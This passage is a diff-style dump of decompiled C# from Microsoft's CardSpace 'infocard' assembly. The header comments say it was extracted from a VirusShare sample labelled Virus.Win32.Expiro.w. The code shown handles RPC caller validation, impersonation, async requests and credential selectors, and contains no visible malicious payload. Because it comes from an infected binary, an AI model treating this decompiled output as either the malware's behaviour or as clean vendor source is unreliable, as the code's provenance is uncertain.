// Type: Microsoft.InfoCards.ClientRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Security;
using System.Security.Cryptography.X509Certificates;
using System.Security.Principal;
using System.Threading;
namespace Microsoft.InfoCards
{
internal abstract class ClientRequest : Request
{
private const int OutstandingCallWaitTime = 30000;
private IDictionary m_asyncOps;
private IDictionary m_cachedCerts;
private Process m_callerProcess;
private WindowsIdentity m_callerIdentity;
private Dictionary<Type, object> m_contextBag;
private object m_serviceAsyncSyncRoot;
private ClientRequest.ServiceAsyncOperation m_serviceAsyncOperation;
private bool m_cancelled;
private bool m_untrusted;
public static Process GetCallingProcessFromRpcHandle(IntPtr RpcHandle)
{
uint pid;
if (NativeMethods.I_RpcBindingInqLocalClientPID(RpcHandle, out pid) != 0U)
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceErrorGettingClientPid")));
Process processFromRpcHandle = (Process) null;
bool flag1 = false;
bool flag2 = false;
while (!flag1)
{
flag1 = true;
try
{
if (flag2)
NativeMcppMethods.AddSystemAccessToProcess(RpcHandle, pid);
processFromRpcHandle = ProcessMonitor.GetProcessById((int) pid);
}
catch (ArgumentException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new UserCancelledException());
}
catch (Win32Exception ex)
{
bool flag3 = false;
if (5 == ex.NativeErrorCode && !flag2)
{
flag1 = false;
flag2 = true;
flag3 = true;
}
if (!flag3)
throw InfoCardTrace.ThrowHelperError((Exception) new SecurityException(SR.GetString("ClientAPIInfocardError"), (Exception) ex));
}
}
return processFromRpcHandle;
}
public ClientRequest(
Process callingProcess,
WindowsIdentity userIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: this(callingProcess, userIdentity, rpcHandle, inArgs, outArgs, ExceptionList.AllNonFatal)
{
}
public ClientRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ExceptionList recoverableExceptions)
: base(rpcHandle, inArgs, outArgs, recoverableExceptions)
{
InfoCardTrace.ThrowInvalidArgumentConditional(null == callingProcess, nameof (callingProcess));
InfoCardTrace.ThrowInvalidArgumentConditional(null == callingIdentity, "userIdentity");
InfoCardTrace.ThrowInvalidArgumentConditional(IntPtr.Zero == rpcHandle, nameof (rpcHandle));
InfoCardTrace.ThrowInvalidArgumentConditional(null == inArgs, nameof (inArgs));
InfoCardTrace.ThrowInvalidArgumentConditional(null == outArgs, nameof (outArgs));
this.m_callerProcess = callingProcess;
this.m_callerIdentity = callingIdentity;
this.m_contextBag = new Dictionary<Type, object>();
this.m_serviceAsyncSyncRoot = new object();
InfoCardService.LifeTimeMonitor.AddClient();
}
public override WindowsIdentity RequestorIdentity => this.m_callerIdentity;
public Process CallerProcess => this.m_callerProcess;
public uint CallerPid => (uint) this.CallerProcess.Id;
protected override void OnInitializeAsSystem()
{
if (this.CallerProcess.HasExited)
throw InfoCardTrace.ThrowHelperError((Exception) new UserCancelledException());
}
public T GetContext<T>()
{
object obj = (object) null;
return this.m_contextBag.TryGetValue(typeof (T), out obj) ? (T) obj : default (T);
}
public void SetContext<T>(T value) => this.m_contextBag[typeof (T)] = (object) value;
public void ClearContext<T>() => this.m_contextBag.Remove(typeof (T));
public void AddAsyncOp(RpcAsyncResult async)
{
lock (this.SyncRoot)
{
if (this.m_asyncOps == null)
this.m_asyncOps = (IDictionary) new HybridDictionary();
this.m_asyncOps[(object) async.Handle] = (object) async;
}
}
public void CancelAsyncOp(int handle)
{
lock (this.SyncRoot)
{
if (this.m_asyncOps == null || !this.m_asyncOps.Contains((object) handle))
return;
((RpcAsyncResult) this.m_asyncOps[(object) handle]).Cancel();
}
}
public void RemoveAsyncOp(int handle)
{
lock (this.SyncRoot)
this.m_asyncOps.Remove((object) handle);
}
private RpcAsyncResult FindAsyncOp(int handle)
{
lock (this.SyncRoot)
return (RpcAsyncResult) this.m_asyncOps[(object) handle];
}
protected void CheckIfAllAsyncOpsCompleted()
{
lock (this.SyncRoot)
{
if (this.m_asyncOps == null)
return;
foreach (RpcAsyncResult rpcAsyncResult in (IEnumerable) this.m_asyncOps.Values)
;
}
}
public RpcAsyncResult WaitForAsyncCompletion(int handle)
{
RpcAsyncResult asyncOp = this.FindAsyncOp(handle);
if (asyncOp == null)
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceInvalidAsyncHandle")));
asyncOp.AsyncWaitHandle.WaitOne();
Exception exception = asyncOp.Exception;
if (exception != null)
throw new InfoCardRequestException(SR.GetString("ServiceAsyncOpGeneratedException"), exception);
return asyncOp;
}
public void CertCacheAdd(string recipientIdentifier, X509Certificate2 cert)
{
lock (this.SyncRoot)
{
if (this.m_cachedCerts == null)
this.m_cachedCerts = (IDictionary) new HybridDictionary();
this.m_cachedCerts[(object) recipientIdentifier] = (object) cert;
}
}
public X509Certificate2 CertCacheFind(string recipientId)
{
lock (this.SyncRoot)
return (X509Certificate2) this.m_cachedCerts[(object) recipientId];
}
public static uint Authorize(IntPtr rpcIfHandle, IntPtr context)
{
uint num = 5;
InfoCardTrace.ThrowInvalidArgumentConditional(IntPtr.Zero == rpcIfHandle, nameof (rpcIfHandle));
InfoCardTrace.ThrowInvalidArgumentConditional(IntPtr.Zero == context, nameof (context));
try
{
using (WindowsIdentity windowsIdentity = Utility.GetWindowsIdentity(context))
{
if (!windowsIdentity.IsAuthenticated)
throw InfoCardTrace.ThrowHelperError((Exception) new SecurityException());
if (!ClientRequest.ValidateToken(context, windowsIdentity))
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceInvalidCallerToken")));
num = 0U;
}
}
catch (RuntimeWrappedException ex)
{
InfoCardTrace.TraceAndLogException((Exception) ex);
InfoCardService.Crash();
}
catch (SecurityException ex)
{
InfoCardTrace.Assert(5U == num, "Unexpected value for err!");
}
catch (InfoCardBaseException ex)
{
throw;
}
catch (Exception ex)
{
if (InfoCardTrace.IsFatal(ex))
InfoCardService.Crash(ex);
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceUnableToValidateCallerToken", (object) ex.Message)));
}
return num;
}
private static bool ValidateToken(IntPtr rpcItfHandle, WindowsIdentity rpcIdentity)
{
Process processFromRpcHandle = ClientRequest.GetCallingProcessFromRpcHandle(rpcItfHandle);
bool flag = NativeMcppMethods.CreateServiceExecutionIdentity(processFromRpcHandle).User.Value == rpcIdentity.User.Value;
if (flag)
flag = NativeMcppMethods.IsTokenValid(processFromRpcHandle);
return flag;
}
protected override void OnDisposeAsSystem()
{
this.m_callerProcess = (Process) null;
object[] objArray = (object[]) null;
lock (this.SyncRoot)
{
if (this.m_asyncOps != null)
{
objArray = new object[this.m_asyncOps.Values.Count];
this.m_asyncOps.Values.CopyTo((Array) objArray, 0);
}
}
if (objArray != null)
{
foreach (RpcAsyncResult rpcAsyncResult in objArray)
rpcAsyncResult.Dispose();
}
InfoCardService.LifeTimeMonitor.RemoveClient();
base.OnDisposeAsSystem();
}
protected void ExecuteCancelable(
ClientRequest.AsyncEntryCallback entry,
ClientRequest.AsyncEntryCallback cancel)
{
lock (this.m_serviceAsyncSyncRoot)
{
if (this.m_cancelled)
{
if (this.m_untrusted)
throw InfoCardTrace.ThrowHelperError((Exception) new UntrustedRecipientException());
throw InfoCardTrace.ThrowHelperError((Exception) new UserCancelledException());
}
InfoCardTrace.Assert(null == this.m_serviceAsyncOperation, "Only a single cancelable service operation can be running at a time");
this.m_serviceAsyncOperation = new ClientRequest.ServiceAsyncOperation(entry, cancel);
try
{
if (!ThreadPool.QueueUserWorkItem(InfoCardTrace.ThunkCallback(new WaitCallback(ClientRequest.ServiceAsyncEntry)), (object) this.m_serviceAsyncOperation))
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("UnableToQueueThreadpool")));
this.m_serviceAsyncOperation.WaitForCompletion();
if (this.m_serviceAsyncOperation.WasCancelled)
{
if (this.m_untrusted)
throw InfoCardTrace.ThrowHelperError((Exception) new UntrustedRecipientException());
throw InfoCardTrace.ThrowHelperError((Exception) new UserCancelledException());
}
if (this.m_serviceAsyncOperation.ExecutionException != null)
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(this.m_serviceAsyncOperation.ExecutionException.Message, this.m_serviceAsyncOperation.ExecutionException));
}
finally
{
this.m_serviceAsyncOperation = (ClientRequest.ServiceAsyncOperation) null;
}
}
}
protected void CancelServiceAsyncOperation(bool untrusted)
{
if (this.m_serviceAsyncOperation != null)
this.m_serviceAsyncOperation.Cancel();
this.m_untrusted = untrusted;
this.m_cancelled = true;
}
private static void ServiceAsyncEntry(object state)
{
ClientRequest.ServiceAsyncOperation serviceAsyncOperation = (ClientRequest.ServiceAsyncOperation) state;
try
{
serviceAsyncOperation.Execute();
}
finally
{
serviceAsyncOperation.Complete();
}
}
internal delegate void AsyncEntryCallback();
private class ServiceAsyncOperation
{
private ClientRequest.AsyncEntryCallback m_cancelCallback;
private ClientRequest.AsyncEntryCallback m_entryCallback;
private ManualResetEvent m_syncEvent;
private Exception m_exception;
private bool m_complete;
private bool m_cancelled;
private object m_sync;
public ServiceAsyncOperation(
ClientRequest.AsyncEntryCallback entry,
ClientRequest.AsyncEntryCallback cancel)
{
this.m_entryCallback = entry;
this.m_cancelCallback = cancel;
this.m_sync = new object();
this.m_syncEvent = new ManualResetEvent(false);
}
public bool WasCancelled => this.m_cancelled;
public Exception ExecutionException => this.m_exception;
public void Complete()
{
if (this.m_complete)
return;
lock (this.m_sync)
{
if (this.m_complete)
return;
this.m_complete = true;
this.m_syncEvent.Set();
}
}
public void WaitForCompletion() => this.m_syncEvent.WaitOne();
public void Execute()
{
lock (this.m_sync)
{
if (this.m_cancelled)
return;
this.m_complete = false;
this.m_syncEvent.Reset();
}
try
{
this.m_entryCallback();
}
catch (Exception ex)
{
if (InfoCardTrace.IsFatal(ex))
InfoCardService.Crash(ex);
else
this.m_exception = ex;
}
}
public void Cancel()
{
lock (this.m_sync)
{
if (this.m_complete)
return;
this.m_cancelled = true;
try
{
if (this.m_cancelCallback == null)
return;
this.m_cancelCallback();
}
finally
{
this.Complete();
}
}
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ClientUIRequest.cs
+305
View File
@@ -0,0 +1,305 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ClientUIRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Threading;
namespace Microsoft.InfoCards
{
internal abstract class ClientUIRequest : ClientRequest
{
private static object s_syncRoot = new object();
private static ClientUIRequest.ProcessHandleDictionary s_connectedProcesses = new ClientUIRequest.ProcessHandleDictionary();
private ManualResetEvent m_uiAgentDone;
private StoreConnection m_rootStoreReference;
private volatile InfoCardUIAgent m_uiAgent;
private InfoCardUIAgent.CallMode m_uiAgentMode;
private AccessibilityApplicationManager m_atManager = new AccessibilityApplicationManager();
public ClientUIRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
InfoCardUIAgent uiAgent,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
InfoCardUIAgent.CallMode callMode,
ExceptionList recoverableExceptions)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs, recoverableExceptions)
{
this.m_uiAgentMode = callMode;
this.m_uiAgentDone = new ManualResetEvent(false);
this.m_uiAgent = uiAgent;
this.m_uiAgent.SetRequest(this);
}
public static int BindToService(IntPtr rpcHandle, out IntPtr context)
{
int service = 0;
context = IntPtr.Zero;
try
{
Process callingProcess = ClientRequest.GetCallingProcessFromRpcHandle(rpcHandle);
WindowsImpersonationContext impersonationContext = NativeMcppMethods.CreateServiceExecutionIdentity(callingProcess).Impersonate();
try
{
int num = 0;
lock (ClientUIRequest.s_syncRoot)
{
try
{
try
{
num = ClientUIRequest.s_connectedProcesses.GetNewHandle();
}
catch (IndexOutOfRangeException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ServiceBusyException(SR.GetString("TooManyClientUIConnections"), (Exception) ex));
}
ClientUIRequest.s_connectedProcesses[num] = callingProcess;
context = new IntPtr(num);
num = 0;
callingProcess = (Process) null;
}
finally
{
callingProcess?.Dispose();
if (num != 0)
ClientUIRequest.s_connectedProcesses.Remove(num);
}
}
}
finally
{
impersonationContext.Undo();
}
}
catch (InfoCardBaseException ex)
{
service = ex.NativeHResult;
}
return service;
}
public static Process GetContextMapping(IntPtr context, bool clear)
{
int int32 = context.ToInt32();
Process contextMapping = (Process) null;
lock (ClientUIRequest.s_syncRoot)
{
if (ClientUIRequest.s_connectedProcesses.ContainsHandle(int32))
{
contextMapping = ClientUIRequest.s_connectedProcesses[int32];
if (clear)
ClientUIRequest.s_connectedProcesses.Remove(int32);
}
}
return contextMapping;
}
public static void RemoveAndDisposeContextMapping(IntPtr context) => ClientUIRequest.GetContextMapping(context, true)?.Dispose();
public InfoCardUIAgent.CallMode UIAgentMode => this.m_uiAgentMode;
internal InfoCardUIAgent UIAgent => this.m_uiAgent;
public int UIAgentPid => (int) this.UIAgent.ProcessId;
public string UIAgentLogonSid => this.UIAgent.TrustedUserSid;
public bool UIAgentActive => this.UIAgent != null && this.UIAgent.IsActive;
protected override void OnInitializeAsUser()
{
base.OnInitializeAsUser();
this.m_rootStoreReference = StoreConnection.CreateConnection();
}
protected override void PreProcessRequest()
{
try
{
base.PreProcessRequest();
}
catch (UIAgentInitializationException ex)
{
throw;
}
catch (UserCancelledException ex)
{
throw;
}
catch (UntrustedRecipientException ex)
{
throw;
}
catch (UIAgentCrashedException ex)
{
throw new CommunicationException(SR.GetString("UIAgentCrash"));
}
catch (InfoCardBaseException ex)
{
throw this.ShowError((Exception) ex);
}
}
protected override void ProcessRequest()
{
try
{
base.ProcessRequest();
}
catch (UntrustedRecipientException ex)
{
throw;
}
catch (UIAgentInitializationException ex)
{
throw;
}
catch (UserCancelledException ex)
{
throw;
}
catch (UIAgentCrashedException ex)
{
throw new CommunicationException(SR.GetString("UIAgentCrash"));
}
catch (InfoCardBaseException ex)
{
throw this.ShowError((Exception) ex);
}
}
protected override void PostProcessRequest()
{
try
{
base.PostProcessRequest();
}
catch (InfoCardBaseException ex)
{
throw this.ShowError((Exception) ex);
}
}
protected Exception ShowError(Exception ex)
{
if (this.m_uiAgent.IsShuttingDown)
return ex;
this.ProcessingException = ex;
this.m_uiAgent.ResetUIResult();
if (ClientUIRequest.RequestResult.Untrusted == this.m_uiAgent.ShowUI(InfoCardUIAgent.CallMode.Error))
ex = InfoCardTrace.ThrowHelperError((Exception) new UntrustedRecipientException());
this.ProcessingException = (Exception) null;
return ex;
}
protected void StartAndWaitForUIAgent()
{
switch (this.m_uiAgent.ShowUI(this.UIAgentMode))
{
case ClientUIRequest.RequestResult.Ok:
break;
case ClientUIRequest.RequestResult.Cancel:
case ClientUIRequest.RequestResult.Error:
throw InfoCardTrace.ThrowHelperError((Exception) new UserCancelledException());
case ClientUIRequest.RequestResult.Untrusted:
throw InfoCardTrace.ThrowHelperError((Exception) new UntrustedRecipientException());
case ClientUIRequest.RequestResult.UIFailedInitialization:
throw InfoCardTrace.ThrowHelperError((Exception) new UIAgentInitializationException());
case ClientUIRequest.RequestResult.UICrashed:
throw InfoCardTrace.ThrowHelperError((Exception) new UIAgentCrashedException());
default:
InfoCardTrace.Assert(false, "We should never get Pending or invalid state here");
break;
}
}
public void StartAccessibilityApplications(uint userATApplicationFlags)
{
if (this.m_uiAgent == null)
return;
string trustedUserSid = this.m_uiAgent.TrustedUserSid;
this.m_atManager.RestartOnInfoCardDesktop(userATApplicationFlags, this.m_uiAgent.TrustedUserToken, ref trustedUserSid, "WinSta0\\" + this.m_uiAgent.DesktopName, this.m_uiAgent.TsSessionId, this.CallerPid, this.RequestorIdentity);
}
public bool RestartAccessibilityApplications()
{
this.m_atManager.Stop();
return this.m_atManager.RestartOnUsersDesktop(this.CallerPid, "WinSta0\\Default", this.RequestorIdentity);
}
public void StopAccessibilityApplications() => this.m_atManager.Stop();
public void UserCancel(bool untrusted)
{
lock (this.SyncRoot)
{
this.CancelServiceAsyncOperation(untrusted);
this.OnUserCancel();
}
}
protected virtual void OnUserCancel()
{
}
private void ReleaseUIAgent()
{
lock (this.SyncRoot)
{
this.CheckIfAllAsyncOpsCompleted();
this.StopAccessibilityApplications();
if (this.m_uiAgent == null)
return;
this.m_uiAgent.ReleaseUI();
this.m_uiAgent.ClearRequest(this);
this.m_uiAgent = (InfoCardUIAgent) null;
}
}
protected override void OnDisposeAsUser()
{
base.OnDisposeAsUser();
if (this.m_rootStoreReference == null)
return;
this.m_rootStoreReference.Close();
this.m_rootStoreReference = (StoreConnection) null;
}
protected override void OnDisposeAsSystem()
{
if (this.m_uiAgentDone != null)
{
this.m_uiAgentDone.Close();
this.m_uiAgentDone = (ManualResetEvent) null;
}
ClientUIRequest.RemoveAndDisposeContextMapping(this.RpcHandle);
this.ReleaseUIAgent();
base.OnDisposeAsSystem();
}
private class ProcessHandleDictionary : HandleDictionary<Process>
{
}
public enum RequestResult
{
Pending,
Ok,
Cancel,
Untrusted,
Error,
UIFailedInitialization,
UICrashed,
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CloseCryptoHandleRequest.cs
+41
View File
@@ -0,0 +1,41 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CloseCryptoHandleRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class CloseCryptoHandleRequest : ClientRequest
{
private int m_cryptoSession;
public CloseCryptoHandleRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
}
protected override void OnMarshalInArgs()
{
this.m_cryptoSession = new InfoCardBinaryReader(this.InArgs).ReadInt32();
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
}
protected override void OnMarshalOutArgs()
{
}
protected override void OnProcess() => CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User).Dispose();
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CommunicationException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CommunicationException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class CommunicationException : InfoCardBaseException
{
private const int HRESULT = -1073413888;
public CommunicationException()
: base(-1073413888)
{
}
public CommunicationException(string message)
: base(-1073413888, message)
{
}
public CommunicationException(string message, Exception inner)
: base(-1073413888, message, inner)
{
}
protected CommunicationException(SerializationInfo si, StreamingContext sc)
: base(-1073413888, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/Constants.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.Constants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal static class Constants
{
internal static class Maxima
{
public const int IssuerKey = 16384;
public const int LogoLength = 1048576;
public const int SaltLength = 1024;
public const int PinHashLength = 1024;
public const int TokenTypes = 32;
public const int CreationParameters = 128;
public const int FileNameLength = 259;
public const int SupportedClaimsLength = 128;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CorruptStoreException.cs
+30
View File
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CorruptStoreException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class CorruptStoreException : Exception
{
public CorruptStoreException()
{
}
public CorruptStoreException(string message)
{
}
public CorruptStoreException(string message, Exception inner)
{
}
protected CorruptStoreException(SerializationInfo si, StreamingContext sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CreateCardRequest.cs
+52
View File
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CreateCardRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Globalization;
using System.IO;
namespace Microsoft.InfoCards
{
internal class CreateCardRequest : UIAgentRequest
{
private InfoCardPolicy m_policy;
private InfoCard m_card;
public CreateCardRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnInitializeAsSystem() => base.OnInitializeAsSystem();
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
this.m_policy = this.GetPolicy();
this.m_card = InfoCard.NewCard(new CultureInfo(this.ParentRequest.UserLanguage));
}
protected override void OnMarshalOutArgs()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
this.m_card.AgentSerialize(this.OutArgs, this.ParentRequest is GetTokenRequest, this.m_policy, connection, new CultureInfo(this.ParentRequest.UserLanguage));
}
finally
{
connection.Close();
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CredentialSelector.cs
+252
View File
@@ -0,0 +1,252 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CredentialSelector
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Text;
using System.Xml;
using System.Xml.Serialization;
namespace Microsoft.InfoCards
{
internal class CredentialSelector : IXmlSerializable
{
private CredentialSelectorType m_type;
private byte[] m_data;
public CredentialSelector() => this.m_type = CredentialSelectorType.InvalidSelector;
public CredentialSelectorType Type
{
get => this.m_type;
set => this.m_type = value;
}
public bool IsComplete() => CredentialSelectorType.InvalidSelector != this.m_type && this.m_data != null && this.m_data.Length > 0;
public string GetStringWithoutNullTerminator()
{
if (this.m_data == null)
return (string) null;
string str = Encoding.Unicode.GetString(this.m_data);
return str.Substring(0, str.Length - 1);
}
public byte[] GetBytes()
{
if (this.m_data == null)
return (byte[]) null;
byte[] destinationArray = new byte[this.m_data.Length];
Array.Copy((Array) this.m_data, 0, (Array) destinationArray, 0, this.m_data.Length);
return destinationArray;
}
public void SetValue(string data) => this.m_data = Encoding.Unicode.GetBytes(data + "\0");
public void SetValue(byte[] data, int index, int length)
{
byte[] destinationArray = new byte[length];
Array.Copy((Array) data, index, (Array) destinationArray, 0, length);
this.m_data = destinationArray;
}
public void Serialize(BinaryWriter writer)
{
writer.Write((int) this.m_type);
Utility.SerializeBytes(writer, this.m_data);
}
public void Deserialize(BinaryReader reader)
{
this.m_type = (CredentialSelectorType) reader.ReadInt32();
this.m_data = reader.ReadBytes(reader.ReadInt32());
}
public System.Xml.Schema.XmlSchema GetSchema() => (System.Xml.Schema.XmlSchema) null;
public void WriteXml(XmlWriter writer)
{
switch (this.m_type)
{
case CredentialSelectorType.X509CertificateIssuerNameSelector:
this.WriteX509CertificateIssuerNameSelector(writer);
break;
case CredentialSelectorType.X509CertificateIssuerSerialNoSelector:
this.WriteX509CertificateIssuerSerialNoSelector(writer);
break;
case CredentialSelectorType.X509CertificateKeyHashSelector:
this.WriteX509CertificateKeyHashSelector(writer);
break;
case CredentialSelectorType.UserNameSelector:
this.WriteUserNameSelector(writer);
break;
case CredentialSelectorType.SelfIssuedCardIdSelector:
this.WriteSelfIssuedCardIdSelector(writer);
break;
case CredentialSelectorType.UserPrincipalNameSelector:
this.WriteUserPrincipalNameSelector(writer);
break;
default:
throw InfoCardTrace.ThrowHelperError((Exception) new XmlException(SR.GetString("UnexpectedElement")));
}
}
public void ReadXml(XmlReader reader)
{
switch (reader.LocalName)
{
case "Username":
this.ReadUserNameSelector(reader);
break;
case "X509IssuerName":
this.ReadX509IssuerNameSelector(reader);
break;
case "X509SerialNumber":
this.ReadX509IssuerSerialNumberSelector(reader);
break;
case "KeyIdentifier":
this.ReadX509KeyIdentifierSelector(reader);
break;
case "PrivatePersonalIdentifier":
this.ReadSelfIssuedSelector(reader);
break;
case "UserPrincipalName":
this.ReadUserPrincipalNameSelector(reader);
break;
default:
throw InfoCardTrace.ThrowHelperError((Exception) new XmlException(SR.GetString("UnexpectedElement")));
}
}
private void WriteUserNameSelector(XmlWriter writer)
{
writer.WriteStartElement("Username", "http://schemas.xmlsoap.org/ws/2005/05/identity");
writer.WriteString(this.GetStringWithoutNullTerminator());
writer.WriteEndElement();
}
private void WriteUserPrincipalNameSelector(XmlWriter writer)
{
writer.WriteStartElement("UserPrincipalName", "http://schemas.xmlsoap.org/ws/2005/05/identity");
writer.WriteString(this.GetStringWithoutNullTerminator());
writer.WriteEndElement();
}
private void WriteX509CertificateIssuerNameSelector(XmlWriter writer)
{
writer.WriteStartElement("X509IssuerName", "http://www.w3.org/2000/09/xmldsig#");
string withoutNullTerminator = this.GetStringWithoutNullTerminator();
if (!string.IsNullOrEmpty(withoutNullTerminator))
writer.WriteString(withoutNullTerminator);
writer.WriteEndElement();
}
private void WriteX509CertificateIssuerSerialNoSelector(XmlWriter writer)
{
writer.WriteStartElement("X509SerialNumber", "http://www.w3.org/2000/09/xmldsig#");
BigInt bigInt = new BigInt(this.GetBytes());
writer.WriteString(bigInt.ToDecimal());
writer.WriteEndElement();
}
private void WriteX509CertificateKeyHashSelector(XmlWriter writer)
{
writer.WriteStartElement("KeyIdentifier", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd");
writer.WriteAttributeString("ValueType", (string) null, "http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1");
writer.WriteString(Convert.ToBase64String(this.GetBytes(), Base64FormattingOptions.None));
writer.WriteEndElement();
}
private void WriteSelfIssuedCardIdSelector(XmlWriter writer)
{
